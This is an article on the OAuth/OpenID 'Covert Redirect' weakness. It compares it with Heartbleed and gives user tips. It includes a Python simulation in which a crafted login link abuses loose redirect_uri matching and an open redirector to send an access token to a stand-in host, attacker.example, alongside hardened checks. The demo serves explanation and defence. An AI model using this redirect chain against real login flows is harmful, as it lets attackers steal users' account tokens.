News organizations reporting on it, a fancy-looking website (ok, not as pretty as Heartbleed's), a sexy logo, and blog posts aplenty saying that the online sky is falling have many people thinking that the OpenID and OAuth flaw known as Covert Redirect is the new Heartbleed.
Where Heartbleed was a genuine security flaw that jeopardized the personal information of approximately everyone who goes online, Covert Redirect is a weakness that has been known about, and largely dealt with, for some time.
Covert Redirect: Definitely NOT the New Heartbleed
Making light of Covert Redirect would be a mistake. It is not on a par with Heartbleed, but it is still a security flaw that can leave your information exposed.
The difference between Covert Redirect and Heartbleed is that most major online platforms have been aware of it for a while now and fixed it back then. Many had already written blog posts about how they'd dealt with it before the story 'broke.' The problem, it seems, is that while the main logins of the major providers are fine, their third-party developers are not.
How does Covert Redirect leave you vulnerable?
Essentially, the token that proves you are logged in to your Google, Facebook, PayPal or LinkedIn account, and the profile data that token unlocks, can be leaked to an attacker through websites that are not run by those companies. Your password itself is not what leaks; the proof of login that the provider hands to the third-party site is.
As an example, you may already be logged in to Facebook when a link in an email or on another site asks you to log in through Facebook to verify your identity. That is the point at which your information is exposed.
The root cause is not an old version of OAuth 2.0 as such but a combination of two loose practices. First, the identity provider accepts any redirect_uri on the third-party site's domain instead of requiring an exact match with the URI the developer registered. Second, the third-party site hosts an open redirector, a page that forwards visitors to whatever URL it is handed. An attacker chains the two: the login link points the provider at the third-party site's redirector, the redirector points at the attacker, and the access token or authorization code the provider sends back travels along to a site the attacker controls.
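To make the mechanism concrete, here is an added simulation (not code from the original post or from any of the providers named above) of both halves of the flaw: a provider that matches redirect_uri only by hostname, and a third-party client site with an open redirector. All hostnames, endpoints and the token value are constructed for the demo. It uses the implicit grant (response_type=token), where the token rides in the URL fragment and browsers carry that fragment across the redirector's 302; the hardened version of each check sits beside the weak one.

```python
"""Simulated Covert Redirect: an OAuth 2.0 implicit-grant token leaks through
an open redirector on the client site when the authorization server matches
redirect_uri loosely. Every hostname, path and token below is constructed."""
from typing import Callable, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Constructed registration data: the client registered this exact redirect URI.
REGISTERED_REDIRECT_URI = "https://client.example/oauth/callback"
ACCESS_TOKEN = "tok_demo_123"  # constructed token the provider would issue


def loose_redirect_uri_ok(requested: str) -> bool:
    """Vulnerable provider check: accept any https URL on the registered host."""
    req, reg = urlsplit(requested), urlsplit(REGISTERED_REDIRECT_URI)
    return req.scheme == "https" and req.hostname == reg.hostname


def strict_redirect_uri_ok(requested: str) -> bool:
    """Hardened provider check (RFC 6749 section 3.1.2.2): simple string
    comparison with the registered URI. A client that needs to remember
    where to send the user afterwards carries that in `state`, not in the URI."""
    return requested == REGISTERED_REDIRECT_URI


def authorization_server(redirect_uri: str, check: Callable[[str], bool]) -> Optional[str]:
    """Return the Location the provider redirects the browser to after login
    (token in the fragment, as in the implicit grant), or None if refused."""
    if not check(redirect_uri):
        return None
    parts = urlsplit(redirect_uri)
    return urlunsplit(parts._replace(fragment=urlencode({"access_token": ACCESS_TOKEN})))


def _browser_follows(location: str, next_url: str) -> str:
    """Model the browser following a 302: if the new Location has no fragment,
    the fragment of the current URL is preserved (this is what carries the token)."""
    target = urlsplit(next_url)
    current = urlsplit(location)
    return urlunsplit(target._replace(fragment=target.fragment or current.fragment))


def client_open_redirector(url: str) -> str:
    """Vulnerable client endpoint /redirect?next=<anything>: forwards unconditionally."""
    next_url = parse_qs(urlsplit(url).query).get("next", ["/"])[0]
    return _browser_follows(url, next_url)


def client_safe_redirector(url: str) -> str:
    """Hardened client endpoint: only same-origin relative paths are honoured;
    anything absolute, scheme-relative (//host) or backslash-tricked falls back to /."""
    parts = urlsplit(url)
    next_url = parse_qs(parts.query).get("next", ["/"])[0]
    target = urlsplit(next_url)
    if (target.scheme or target.netloc or not next_url.startswith("/")
            or next_url.startswith("//") or "\\" in next_url):
        next_url = "/"
    own_origin = urlunsplit((parts.scheme, parts.netloc, next_url, "", ""))
    return _browser_follows(url, own_origin)


def run_attack(check: Callable[[str], bool],
               redirector: Callable[[str], str]) -> Optional[Tuple[str, str]]:
    """Attacker's link: the registered client's redirector, with `next` pointing
    at the attacker, handed to the provider as redirect_uri. Returns (host that
    ends up holding the token, fragment) or None if the provider refused."""
    attacker_redirect_uri = "https://client.example/redirect?" + urlencode(
        {"next": "https://attacker.example/collect"})
    location = authorization_server(attacker_redirect_uri, check)
    if location is None:
        return None
    final = urlsplit(redirector(location))
    return final.hostname, final.fragment


if __name__ == "__main__":
    print("loose provider + open redirector :", run_attack(loose_redirect_uri_ok, client_open_redirector))
    print("strict provider + open redirector:", run_attack(strict_redirect_uri_ok, client_open_redirector))
    print("loose provider + safe redirector :", run_attack(loose_redirect_uri_ok, client_safe_redirector))
```

Either fix alone stops the leak: with exact redirect_uri matching the provider never sends the token to the redirector page, and with a same-origin-only redirector the token never leaves client.example. Fixing only the provider side is what the big platforms did; the third-party sites that still host open redirectors are the loose end the story is about.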
Which websites are vulnerable to Covert Redirect?
A number of the common websites which you use online are vulnerable to the Covert Redirect flaw. Examples include:
The degree of exposure varies from site to site, but all of them know about the problem and put mitigations in place long ago. In each case the weakness lies with a third-party developer; it is not 'in-house.'
How to protect yourself against Covert Redirect
For the most part, you are already protected against Covert Redirect if you follow some common-sense rules:
- Always verify links before clicking on them
- Never blindly authorize any app or website to access your information
Simply put, when someone asks you to log in or authorize access, it had better be because you initiated it. Say you want to leave a comment on NFL.com, which requires a Facebook ID. That will show an authorization window, and that is fine.
If you were to land on a site you don't know and a pop-up window asked for authorization to access your Facebook ID, that should be your cue to hit the "NO" button.
As always, good encryption, such as that offered by a quality VPN service, adds a layer of protection around your traffic on untrusted networks. Be clear about what it does not do, though: Covert Redirect leaks the token through a perfectly legitimate HTTPS redirect, so a VPN does nothing to stop it, and using one is no reason to blindly give authorization to apps and websites.